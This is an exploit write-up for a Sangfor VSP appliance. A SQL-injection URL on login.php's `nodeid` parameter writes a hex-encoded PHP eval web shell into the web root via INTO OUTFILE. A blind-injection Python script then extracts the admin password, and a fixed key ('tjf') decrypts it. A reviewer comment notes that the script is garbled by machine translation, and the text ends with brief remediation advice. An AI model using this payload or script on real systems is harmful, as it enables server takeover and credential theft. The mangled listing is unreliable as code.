Sangfor VSP external data center getshell
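1. getshell: the `nodeid` parameter of `login.php` is injectable, and a `UNION SELECT ... INTO OUTFILE` writes a PHP file into the appliance's web root (`htdocs`):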
https://localhost/src/login.php?action_c=login&user_type=1&user=admin&pass=admin&nodeid=1 and 1=2 union select 0x3c3f70687020406576616c28245f504f53545b277362275d293b3f3e into outfile 'D:\\Program Files\\Sangfor\\SSL\\LogKeeper\\htdocs\\test.php'
2. Inject to get the administrator password
The same injection point can be used to read the administrator password; the following Python script automates it:
# NOTE(review): this listing was flattened onto one line and altered by machine
# translation (spaces inside identifiers and strings, changed letter case), so it
# is not runnable as shown. It is kept verbatim below. The print statements are
# Python 2 syntax.
#
# What the listing shows, read from a defender's side:
# - Boolean-based blind SQL injection: a condition is appended to the `nodeid`
#   parameter of src/login.php. It uses mid() to compare one character of
#   sys_adt.sys_adt_pass (row id = 1) with a candidate from a 16-entry list of
#   hex digits, for positions 0..16.
# - The login page's response text is the oracle. The script treats "incorrect
#   user name or password" as a match, "database connection failed" as a miss,
#   and "login denied" as an IP ban. Returning one uniform failure message and
#   binding `nodeid` as an integer parameter removes that signal.
# - The lockout (5 failures, about 305 s per the script's own message) only slows
#   the loop, because the script sleeps and continues. Rate limiting does not
#   replace fixing the query.
# - Requests are sent with verify=False (TLS certificate validation disabled)
#   and a 10 second timeout.
# - Detection idea: many login.php requests from one source whose `nodeid` value
#   is not a plain integer, interleaved with pauses of roughly 305 seconds.
# Encoding: utf-8import requestsimport sysimport timeif len (sys. argv) <2: print "useage: test. py target \ r" print "example: python test. py https://192.168.222.128/ "Sys. exit (0) target = sys. argv [1] def exploit (url, pointer): password = "" list = ["a", "B", "c", "d", "e ", "f", "0", "1", "2", "3", "4", "5", "6", "7", "8 ", "9"] while pointer <17: flag = Falseindex = 0 while (index <len (list): SQL = "and (select mid (sys_adt_pass, % d, 1) from sys_adt where id = 1) = \ "% s \" "% (pointer + 1, list [index]) response = requests. get (url + "src/login. php? Action_c = login & user_type = 1 & user = admin & pass = & nodeid = 1 "+ SQL, timeout = 10, verify = False) if" login denied "in response. content: # When the IP address is blocked, the latency is 305 seconds. print "login failure exceeded 5 times, ip is banned, wait for 305 seconds to continue" time. sleep (305) elif "incorrect user name or password" in response. content: print "password [% d] = % s" % (pointer, list [index]) password + = list [index] breakelif "database connection failed" in response. content: index + = 1 else: print" Error, exit! "Sys. exit (0) pointer + = 1 print (" Admin's password is % s ") % (password) exploit (target, 0) print" done!"
Result of running the script:
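Open this website to decrypt the recovered value: http://des.online-domain-tools.com/
Remove the last character of the recovered password value, use the key tjf, and click decrypt to obtain the plaintext password. This works because the stored password appears to be reversibly encrypted with a fixed key rather than hashed with a salted one-way function, so anyone who can read the column can recover the password.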
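Solution:
Strengthen input filtering: accept only an integer for `nodeid`, and pass request parameters to the database as bound parameters instead of concatenating them into the SQL string. As defence in depth, run the application's database account without file-write rights (on MySQL, the FILE privilege, or restrict `secure_file_priv`) so that `INTO OUTFILE` cannot write into the web root.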